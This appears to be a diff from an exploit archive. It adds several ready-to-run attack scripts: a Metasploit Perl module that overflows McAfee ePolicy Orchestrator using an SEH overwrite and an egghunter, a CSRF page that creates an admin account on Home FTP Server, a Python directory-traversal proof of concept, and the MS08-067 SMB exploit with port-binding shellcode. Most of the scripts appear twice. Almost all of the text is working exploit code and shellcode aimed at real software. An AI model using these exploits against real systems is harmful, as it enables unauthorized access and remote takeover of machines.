# dereferenced from the overwritten data and then called:
# naisp32!naSPIPE_MainWorkFunc+0x3ed:
# mov ecx, [eax+0x270] (eax is offset 116)
# push ecx
# call [eax+0x26c]
#
# When this happens, the first SEH in the chain is also
# overwritten at offset 96, so the exception results
# in our code being called. If we knew of an address
# in memory that pointed to our shellcode, we could
# avoid the SEH completely and use the above call to
# execute our code. This is actually practical, since
# we can upload almost arbitrary amounts of data into
# the heap and then overwrite the function pointer above.
#
# This method is left as an excercise to the reader.
#
# This module will use the SEH overwrite with a pop/pop/ret or
# a jmp/call ebx (2000 only) to gain control of execution. This
# removes the need for a large data upload and should result in
# reliable execution without the need to brute force.
#
# Since the SEH method only leaves ~140 bytes of contiguous
# shellcode space, we use an egghunter to find the real
# payload that we stuffed into the heap as POST data.
#
# Trigger the exception by passing a bad pointer
substr($evil, $target->[1] + 20, 4, Pex::Text::AlphaNumText(3)."\xff");
# Return to pop/pop/ret or equivalent
substr($evil, $target->[1], 4, pack('V', $target->[2]));
# Jump to the egghunter
substr($evil, $target->[1] - 4, 2, "\xeb\x1a");
# Egghunter has 140 bytes of room to work
substr($evil, $target->[1] + 24, length($egghunt), $egghunt);
# Create our post data containing the shellcode
my $data = Pex::Text::AlphaNumText(int(rand(500)+32));
# Embed the search tag and shellcode
$data .= ($eggtag x 2) . $shellcode;
# Add some extra padding
$data .= Pex::Text::AlphaNumText(int(rand(500)+32));
my $req = "GET /spipe/pkg HTTP/1.0\r\n";
$req .="User-Agent: Mozilla/4.0 (compatible; SPIPE/1.0\r\n";
$req .="Content-Length: ". length($data). "\r\n";
$req .="AgentGuid=${guid}\r\n";
$req .="Source=${evil}\r\n";
$req .= "\r\n";
$req .= $data;
$self->PrintLine(sprintf("[*] Trying ".$target->[0]." using 0x%.8x...", $target->[2]));
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}
$s->Send($req);
$self->PrintLine("[*] Waiting up to two minutes for the egghunter...");
$s->Recv(-1, 120);
$self->Handler($s);
$s->Close;
return;
}
1;
# milw0rm.com [2006-10-01]
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::mcafee_epolicy_source;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'McAfee ePolicy Orchestrator / ProtPilot Source Overflow',
'Version' => '$Revision: 1.0 $',
'Authors' =>
[
'muts <muts [at] remote-exploit.org>',
'xbxice[at]yahoo.com',
'H D Moore <hdm [at] metasploit.com>'
],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'win2000', 'win2003' ],
'Priv' => 0,
'AutoOpts' => { 'EXITFUNC' => 'thread' },
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 81],
'SSL' => [0, 'BOOL', 'Use SSL'],
},
'Payload' =>
{
# Space is almost unlimited, but 1024 is fine for now
'Space' => 1024,
'BadChars' => "\x00\x09\x0a\x0b\x0d\x20\x26\x2b\x3d\x25\x8c\x3c\xff",
'Keys' => ['+ws2ord'],
},
'Description' => Pex::Text::Freeform(qq{
This is a stack overflow exploit for McAfee ePolicy Orchestrator 3.5.0
and ProtectionPilot 1.1.0. Tested on Windows 2000 SP4 and Windows 2003 SP1.
This module is based on the exploit by xbxice and muts.
}),
'Refs' =>
[
['URL', 'http://www.remote-exploit.org/advisories/mcafee-epo.pdf' ],
],
'DefaultTarget' => 0,
'Targets' =>
[
['Windows 2000/2003 ePo 3.5.0/ProtectionPilot 1.1.0', 96, 0x601EDBDA], # pop pop ret xmlutil.dll
],
'Keys' => ['epo'],
'DisclosureDate' => 'Jul 17 2006',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
# Use a egghunter stub to find the payload
my $eggtag = Pex::Text::AlphaNumText(4);
my $egghunt =
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02" .
"\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8" .
$eggtag .
"\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7";
# Create the 64-byte GUID
my $guid = Pex::Text::AlphaNumText(64);
# Create the 260 byte Source header
my $evil = Pex::Text::AlphaNumText(260);
#
# A long Source header results in a handful of exceptions.
# The first exception occurs with a pointer at offset 116.
# This exception occurs because a function pointer is
# dereferenced from the overwritten data and then called:
# naisp32!naSPIPE_MainWorkFunc+0x3ed:
# mov ecx, [eax+0x270] (eax is offset 116)
# push ecx
# call [eax+0x26c]
#
# When this happens, the first SEH in the chain is also
# overwritten at offset 96, so the exception results
# in our code being called. If we knew of an address
# in memory that pointed to our shellcode, we could
# avoid the SEH completely and use the above call to
# execute our code. This is actually practical, since
# we can upload almost arbitrary amounts of data into
# the heap and then overwrite the function pointer above.
#
# This method is left as an excercise to the reader.
#
# This module will use the SEH overwrite with a pop/pop/ret or
# a jmp/call ebx (2000 only) to gain control of execution. This
# removes the need for a large data upload and should result in
# reliable execution without the need to brute force.
#
# Since the SEH method only leaves ~140 bytes of contiguous
# shellcode space, we use an egghunter to find the real
# payload that we stuffed into the heap as POST data.
#
# Trigger the exception by passing a bad pointer
substr($evil, $target->[1] + 20, 4, Pex::Text::AlphaNumText(3)."\xff");
# Return to pop/pop/ret or equivalent
substr($evil, $target->[1], 4, pack('V', $target->[2]));
# Jump to the egghunter
substr($evil, $target->[1] - 4, 2, "\xeb\x1a");
# Egghunter has 140 bytes of room to work
substr($evil, $target->[1] + 24, length($egghunt), $egghunt);
# Create our post data containing the shellcode
my $data = Pex::Text::AlphaNumText(int(rand(500)+32));
# Embed the search tag and shellcode
$data .= ($eggtag x 2) . $shellcode;
# Add some extra padding
$data .= Pex::Text::AlphaNumText(int(rand(500)+32));
my $req = "GET /spipe/pkg HTTP/1.0\r\n";
$req .="User-Agent: Mozilla/4.0 (compatible; SPIPE/1.0\r\n";
$req .="Content-Length: ". length($data). "\r\n";
$req .="AgentGuid=${guid}\r\n";
$req .="Source=${evil}\r\n";
$req .= "\r\n";
$req .= $data;
$self->PrintLine(sprintf("[*] Trying ".$target->[0]." using 0x%.8x...", $target->[2]));
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}
$s->Send($req);
$self->PrintLine("[*] Waiting up to two minutes for the egghunter...");
$s->Recv(-1, 120);
$self->Handler($s);
$s->Close;
return;
}
1;
# milw0rm.com [2006-10-01]

9
platforms/windows/remote/34047.html Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/40405/info
Home FTP Server is prone to a cross-site request-forgery vulnerability.
Exploiting this issue may allow a remote attacker to perform certain administrative actions and gain unauthorized access to the affected application. Other attacks are also possible.
Home FTP Server 1.10.3 (build 144) is vulnerable; other versions may be affected.
<html> <body> <img src="http://www.example.com/?addnewmember=new_user&pass=Password1&home=c:\&allowdownload=on&allowupload=on&allowrename=on&allowdeletefile=on&allowchangedir=on&allowcreatedir=on&allowdeletedir=on&virtualdir=&filecontrol=" /> </body> </html>

111
platforms/windows/remote/34050.py Executable file
View file

@ -0,0 +1,111 @@
source: http://www.securityfocus.com/bid/40419/info
Home FTP Server is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this issue can allow an attacker to download, upload, and delete arbitrary files outside of the FTP server's root directory. This may aid in further attacks.
Home FTP Server 1.10.2.143 and 1.11.1.149 are vulnerable; other versions may also be affected.
#============================================================================================================#
# _ _ __ __ __ _______ _____ __ __ _____ _ _ _____ __ __ #
# /_/\ /\_\ /\_\ /\_\ /\_\ /\_______)\ ) ___ ( /_/\__/\ ) ___ ( /_/\ /\_\ /\_____\/_/\__/\ #
# ) ) )( ( ( \/_/( ( ( ( ( ( \(___ __\// /\_/\ \ ) ) ) ) )/ /\_/\ \ ) ) )( ( (( (_____/) ) ) ) ) #
# /_/ //\\ \_\ /\_\\ \_\ \ \_\ / / / / /_/ (_\ \ /_/ /_/ // /_/ (_\ \/_/ //\\ \_\\ \__\ /_/ /_/_/ #
# \ \ / \ / // / // / /__ / / /__ ( ( ( \ \ )_/ / / \ \ \_\/ \ \ )_/ / /\ \ / \ / // /__/_\ \ \ \ \ #
# )_) /\ (_(( (_(( (_____(( (_____( \ \ \ \ \/_\/ / )_) ) \ \/_\/ / )_) /\ (_(( (_____\)_) ) \ \ #
# \_\/ \/_/ \/_/ \/_____/ \/_____/ /_/_/ )_____( \_\/ )_____( \_\/ \/_/ \/_____/\_\/ \_\/ #
# #
#============================================================================================================#
# #
# Vulnerability............Directory Traversal #
# Software.................Home FTP Server 1.10.2.143 #
# Download.................http://downstairs.dnsalias.net/files/HomeFtpServerInstall.exe #
# Date.....................5/27/10 #
# #
#============================================================================================================#
# #
# Site.....................http://cross-site-scripting.blogspot.com/ #
# Email....................john.leitch5@gmail.com #
# #
#============================================================================================================#
# #
# ##Description## #
# #
# A directory traversal vulnerability in Home FTP Server 1.10.2.143 can be exploited to read, write, and #
# delete files outside of the ftp root directory. #
# #
# #
# ##Exploit## #
# #
# RETR [Drive Letter]:\[Filename] #
# STOR [Drive Letter]:\[Filename] #
# DELE [Drive Letter]:\[Filename] #
# #
# #
# ##Proof of Concept## #
# #
import sys, socket, re
host = 'localhost'
port = 21
user = 'anonymous'
password = ''
timeout = 8
buffer_size = 8192
def get_data_port(s):
s.send('PASV\r\n')
resp = s.recv(buffer_size)
pasv_info = re.search(u'(\d+),' * 5 + u'(\d+)', resp)
if (pasv_info == None):
raise Exception(resp)
return int(pasv_info.group(5)) * 256 + int(pasv_info.group(6))
def retr_file(s, filename):
pasv_port = get_data_port(s)
if (pasv_port == None):
return None
s.send('RETR ' + filename + '\r\n')
resp = s.recv(8192)
if resp[:3] != '150': raise Exception(resp)
print resp
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2.connect((host, pasv_port))
s2.settimeout(2.0)
resp = s2.recv(8192)
s2.close()
return resp
def get_file(filename):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(timeout)
print s.recv(buffer_size)
s.send('USER ' + user + '\r\n')
print s.recv(buffer_size)
s.send('PASS ' + password + '\r\n')
print s.recv(buffer_size)
print retr_file(s, filename)
print s.recv(buffer_size)
s.close()
get_file('c:\\boot.ini')

314
platforms/windows/remote/7132.py
View file

@ -1,157 +1,157 @@
#!/usr/bin/env python
#############################################################################
# MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)
# www.hackingspirits.com
# www.coffeeandsecurity.com
# Email: d3basis.m0hanty @ gmail.com
#############################################################################
import struct
import sys
from threading import Thread #Thread is imported incase you would like to modify
#the src to run against multiple targets.
try:
from impacket import smb
from impacket import uuid
from impacket.dcerpc import dcerpc
from impacket.dcerpc import transport
except ImportError, _:
print 'Install the following library to make this script work'
print 'Impacket : http://oss.coresecurity.com/projects/impacket.html'
print 'PyCrypto : http://www.amk.ca/python/code/crypto.html'
sys.exit(1)
print '#######################################################################'
print '# MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)'
print '# www.hackingspirits.com'
print '# www.coffeeandsecurity.com'
print '# Email: d3basis.m0hanty @ gmail.com'
print '#######################################################################\n'
#Portbind shellcode from metasploit; Binds port to TCP port 4444
shellcode = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
shellcode += "\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xe9"
shellcode += "\x4a\xb6\xa9\x83\xee\xfc\xe2\xf4\x15\x20\x5d\xe4\x01\xb3\x49\x56"
shellcode += "\x16\x2a\x3d\xc5\xcd\x6e\x3d\xec\xd5\xc1\xca\xac\x91\x4b\x59\x22"
shellcode += "\xa6\x52\x3d\xf6\xc9\x4b\x5d\xe0\x62\x7e\x3d\xa8\x07\x7b\x76\x30"
shellcode += "\x45\xce\x76\xdd\xee\x8b\x7c\xa4\xe8\x88\x5d\x5d\xd2\x1e\x92\x81"
shellcode += "\x9c\xaf\x3d\xf6\xcd\x4b\x5d\xcf\x62\x46\xfd\x22\xb6\x56\xb7\x42"
shellcode += "\xea\x66\x3d\x20\x85\x6e\xaa\xc8\x2a\x7b\x6d\xcd\x62\x09\x86\x22"
shellcode += "\xa9\x46\x3d\xd9\xf5\xe7\x3d\xe9\xe1\x14\xde\x27\xa7\x44\x5a\xf9"
shellcode += "\x16\x9c\xd0\xfa\x8f\x22\x85\x9b\x81\x3d\xc5\x9b\xb6\x1e\x49\x79"
shellcode += "\x81\x81\x5b\x55\xd2\x1a\x49\x7f\xb6\xc3\x53\xcf\x68\xa7\xbe\xab"
shellcode += "\xbc\x20\xb4\x56\x39\x22\x6f\xa0\x1c\xe7\xe1\x56\x3f\x19\xe5\xfa"
shellcode += "\xba\x19\xf5\xfa\xaa\x19\x49\x79\x8f\x22\xa7\xf5\x8f\x19\x3f\x48"
shellcode += "\x7c\x22\x12\xb3\x99\x8d\xe1\x56\x3f\x20\xa6\xf8\xbc\xb5\x66\xc1"
shellcode += "\x4d\xe7\x98\x40\xbe\xb5\x60\xfa\xbc\xb5\x66\xc1\x0c\x03\x30\xe0"
shellcode += "\xbe\xb5\x60\xf9\xbd\x1e\xe3\x56\x39\xd9\xde\x4e\x90\x8c\xcf\xfe"
shellcode += "\x16\x9c\xe3\x56\x39\x2c\xdc\xcd\x8f\x22\xd5\xc4\x60\xaf\xdc\xf9"
shellcode += "\xb0\x63\x7a\x20\x0e\x20\xf2\x20\x0b\x7b\x76\x5a\x43\xb4\xf4\x84"
shellcode += "\x17\x08\x9a\x3a\x64\x30\x8e\x02\x42\xe1\xde\xdb\x17\xf9\xa0\x56"
shellcode += "\x9c\x0e\x49\x7f\xb2\x1d\xe4\xf8\xb8\x1b\xdc\xa8\xb8\x1b\xe3\xf8"
shellcode += "\x16\x9a\xde\x04\x30\x4f\x78\xfa\x16\x9c\xdc\x56\x16\x7d\x49\x79"
shellcode += "\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\x19\xc0\xb2\xf6"
shellcode += "\xba\xb5\x60\x56\x39\x4a\xb6\xa9"
#Payload for Windows 2000 target
payload_1='\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00'
payload_1+='\x41\x41\x41\x41\x41\x41\x41\x41'
payload_1+='\x41\x41\x41\x41\x41\x41\x41\x41'
payload_1+='\x41\x41'
payload_1+='\x2f\x68\x18\x00\x8b\xc4\x66\x05\x94\x04\x8b\x00\xff\xe0'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\xeb\xcc'
payload_1+='\x00\x00'
#Payload for Windows 2003[SP2] target
payload_2='\x41\x00\x5c\x00'
payload_2+='\x2e\x00\x2e\x00\x5c\x00\x2e\x00'
payload_2+='\x2e\x00\x5c\x00\x0a\x32\xbb\x77'
payload_2+='\x8b\xc4\x66\x05\x60\x04\x8b\x00'
payload_2+='\x50\xff\xd6\xff\xe0\x42\x84\xae'
payload_2+='\xbb\x77\xff\xff\xff\xff\x01\x00'
payload_2+='\x01\x00\x01\x00\x01\x00\x43\x43'
payload_2+='\x43\x43\x37\x48\xbb\x77\xf5\xff'
payload_2+='\xff\xff\xd1\x29\xbc\x77\xf4\x75'
payload_2+='\xbd\x77\x44\x44\x44\x44\x9e\xf5'
payload_2+='\xbb\x77\x54\x13\xbf\x77\x37\xc6'
payload_2+='\xba\x77\xf9\x75\xbd\x77\x00\x00'
if sys.argv[2]=='1': #Windows 2000 Payload
payload=payload_1
print '[-]Windows 2000 payload loaded'
if sys.argv[2]=='2': #Windows 2003[SP2] Payload
payload=payload_2
print '[-]Windows 2003[SP2] payload loaded'
class SRVSVC_Exploit(Thread):
def __init__(self, target, osver, port=445):
super(SRVSVC_Exploit, self).__init__()
self.__port = port
self.target = target
self.osver = osver
def __DCEPacket(self):
print '[-]Initiating connection'
self.__trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % self.target)
self.__trans.connect()
print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % self.target
self.__dce = self.__trans.DCERPC_class(self.__trans)
self.__dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))
# Constructing Malicious Packet
self.__stub='\x01\x00\x00\x00'
self.__stub+='\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00'
self.__stub+=shellcode
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x00\x00\x00\x00'
self.__stub+='\x2f\x00\x00\x00\x00\x00\x00\x00\x2f\x00\x00\x00'
self.__stub+=payload
self.__stub+='\x00\x00\x00\x00'
self.__stub+='\x02\x00\x00\x00\x02\x00\x00\x00'
self.__stub+='\x00\x00\x00\x00\x02\x00\x00\x00'
self.__stub+='\x5c\x00\x00\x00\x01\x00\x00\x00'
self.__stub+='\x01\x00\x00\x00'
return
def run(self):
self.__DCEPacket()
self.__dce.call(0x1f, self.__stub) #0x1f (or 31)- NetPathCanonicalize Operation
print '[-]Exploit sent to target successfully...\n[1]Telnet to port 4444 on target machine...'
if __name__ == '__main__':
try:
target = sys.argv[1]
osver = sys.argv[2]
except IndexError:
print '\nUsage: %s <target ip> <os version>\n' % sys.argv[0]
print 'Example: srvsvcexpl.py 192.168.1.1 2\n'
print 'Select OS Version'
print '[-]Windows 2000: OS Version = 1'
print '[-]Windows 2003[SP2]: OS Version = 2'
sys.exit(-1)
current = SRVSVC_Exploit(target, osver)
current.start()
#print '[-]Exploit sent to target successfully...\n[-]Telnet to port 4444 on target machine...'
# milw0rm.com [2008-11-16]
#!/usr/bin/env python
#############################################################################
# MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)
# www.hackingspirits.com
# www.coffeeandsecurity.com
# Email: d3basis.m0hanty @ gmail.com
#############################################################################
import struct
import sys
from threading import Thread #Thread is imported incase you would like to modify
#the src to run against multiple targets.
try:
from impacket import smb
from impacket import uuid
from impacket.dcerpc import dcerpc
from impacket.dcerpc import transport
except ImportError, _:
print 'Install the following library to make this script work'
print 'Impacket : http://oss.coresecurity.com/projects/impacket.html'
print 'PyCrypto : http://www.amk.ca/python/code/crypto.html'
sys.exit(1)
print '#######################################################################'
print '# MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)'
print '# www.hackingspirits.com'
print '# www.coffeeandsecurity.com'
print '# Email: d3basis.m0hanty @ gmail.com'
print '#######################################################################\n'
#Portbind shellcode from metasploit; Binds port to TCP port 4444
shellcode = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
shellcode += "\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xe9"
shellcode += "\x4a\xb6\xa9\x83\xee\xfc\xe2\xf4\x15\x20\x5d\xe4\x01\xb3\x49\x56"
shellcode += "\x16\x2a\x3d\xc5\xcd\x6e\x3d\xec\xd5\xc1\xca\xac\x91\x4b\x59\x22"
shellcode += "\xa6\x52\x3d\xf6\xc9\x4b\x5d\xe0\x62\x7e\x3d\xa8\x07\x7b\x76\x30"
shellcode += "\x45\xce\x76\xdd\xee\x8b\x7c\xa4\xe8\x88\x5d\x5d\xd2\x1e\x92\x81"
shellcode += "\x9c\xaf\x3d\xf6\xcd\x4b\x5d\xcf\x62\x46\xfd\x22\xb6\x56\xb7\x42"
shellcode += "\xea\x66\x3d\x20\x85\x6e\xaa\xc8\x2a\x7b\x6d\xcd\x62\x09\x86\x22"
shellcode += "\xa9\x46\x3d\xd9\xf5\xe7\x3d\xe9\xe1\x14\xde\x27\xa7\x44\x5a\xf9"
shellcode += "\x16\x9c\xd0\xfa\x8f\x22\x85\x9b\x81\x3d\xc5\x9b\xb6\x1e\x49\x79"
shellcode += "\x81\x81\x5b\x55\xd2\x1a\x49\x7f\xb6\xc3\x53\xcf\x68\xa7\xbe\xab"
shellcode += "\xbc\x20\xb4\x56\x39\x22\x6f\xa0\x1c\xe7\xe1\x56\x3f\x19\xe5\xfa"
shellcode += "\xba\x19\xf5\xfa\xaa\x19\x49\x79\x8f\x22\xa7\xf5\x8f\x19\x3f\x48"
shellcode += "\x7c\x22\x12\xb3\x99\x8d\xe1\x56\x3f\x20\xa6\xf8\xbc\xb5\x66\xc1"
shellcode += "\x4d\xe7\x98\x40\xbe\xb5\x60\xfa\xbc\xb5\x66\xc1\x0c\x03\x30\xe0"
shellcode += "\xbe\xb5\x60\xf9\xbd\x1e\xe3\x56\x39\xd9\xde\x4e\x90\x8c\xcf\xfe"
shellcode += "\x16\x9c\xe3\x56\x39\x2c\xdc\xcd\x8f\x22\xd5\xc4\x60\xaf\xdc\xf9"
shellcode += "\xb0\x63\x7a\x20\x0e\x20\xf2\x20\x0b\x7b\x76\x5a\x43\xb4\xf4\x84"
shellcode += "\x17\x08\x9a\x3a\x64\x30\x8e\x02\x42\xe1\xde\xdb\x17\xf9\xa0\x56"
shellcode += "\x9c\x0e\x49\x7f\xb2\x1d\xe4\xf8\xb8\x1b\xdc\xa8\xb8\x1b\xe3\xf8"
shellcode += "\x16\x9a\xde\x04\x30\x4f\x78\xfa\x16\x9c\xdc\x56\x16\x7d\x49\x79"
shellcode += "\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\x19\xc0\xb2\xf6"
shellcode += "\xba\xb5\x60\x56\x39\x4a\xb6\xa9"
#Payload for Windows 2000 target
payload_1='\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00'
payload_1+='\x41\x41\x41\x41\x41\x41\x41\x41'
payload_1+='\x41\x41\x41\x41\x41\x41\x41\x41'
payload_1+='\x41\x41'
payload_1+='\x2f\x68\x18\x00\x8b\xc4\x66\x05\x94\x04\x8b\x00\xff\xe0'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\xeb\xcc'
payload_1+='\x00\x00'
#Payload for Windows 2003[SP2] target
payload_2='\x41\x00\x5c\x00'
payload_2+='\x2e\x00\x2e\x00\x5c\x00\x2e\x00'
payload_2+='\x2e\x00\x5c\x00\x0a\x32\xbb\x77'
payload_2+='\x8b\xc4\x66\x05\x60\x04\x8b\x00'
payload_2+='\x50\xff\xd6\xff\xe0\x42\x84\xae'
payload_2+='\xbb\x77\xff\xff\xff\xff\x01\x00'
payload_2+='\x01\x00\x01\x00\x01\x00\x43\x43'
payload_2+='\x43\x43\x37\x48\xbb\x77\xf5\xff'
payload_2+='\xff\xff\xd1\x29\xbc\x77\xf4\x75'
payload_2+='\xbd\x77\x44\x44\x44\x44\x9e\xf5'
payload_2+='\xbb\x77\x54\x13\xbf\x77\x37\xc6'
payload_2+='\xba\x77\xf9\x75\xbd\x77\x00\x00'
if sys.argv[2]=='1': #Windows 2000 Payload
payload=payload_1
print '[-]Windows 2000 payload loaded'
if sys.argv[2]=='2': #Windows 2003[SP2] Payload
payload=payload_2
print '[-]Windows 2003[SP2] payload loaded'
class SRVSVC_Exploit(Thread):
def __init__(self, target, osver, port=445):
super(SRVSVC_Exploit, self).__init__()
self.__port = port
self.target = target
self.osver = osver
def __DCEPacket(self):
print '[-]Initiating connection'
self.__trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % self.target)
self.__trans.connect()
print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % self.target
self.__dce = self.__trans.DCERPC_class(self.__trans)
self.__dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))
# Constructing Malicious Packet
self.__stub='\x01\x00\x00\x00'
self.__stub+='\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00'
self.__stub+=shellcode
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x00\x00\x00\x00'
self.__stub+='\x2f\x00\x00\x00\x00\x00\x00\x00\x2f\x00\x00\x00'
self.__stub+=payload
self.__stub+='\x00\x00\x00\x00'
self.__stub+='\x02\x00\x00\x00\x02\x00\x00\x00'
self.__stub+='\x00\x00\x00\x00\x02\x00\x00\x00'
self.__stub+='\x5c\x00\x00\x00\x01\x00\x00\x00'
self.__stub+='\x01\x00\x00\x00'
return
def run(self):
self.__DCEPacket()
self.__dce.call(0x1f, self.__stub) #0x1f (or 31)- NetPathCanonicalize Operation
print '[-]Exploit sent to target successfully...\n[1]Telnet to port 4444 on target machine...'
if __name__ == '__main__':
try:
target = sys.argv[1]
osver = sys.argv[2]
except IndexError:
print '\nUsage: %s <target ip> <os version>\n' % sys.argv[0]
print 'Example: srvsvcexpl.py 192.168.1.1 2\n'
print 'Select OS Version'
print '[-]Windows 2000: OS Version = 1'
print '[-]Windows 2003[SP2]: OS Version = 2'
sys.exit(-1)
current = SRVSVC_Exploit(target, osver)
current.start()
#print '[-]Exploit sent to target successfully...\n[-]Telnet to port 4444 on target machine...'
# milw0rm.com [2008-11-16]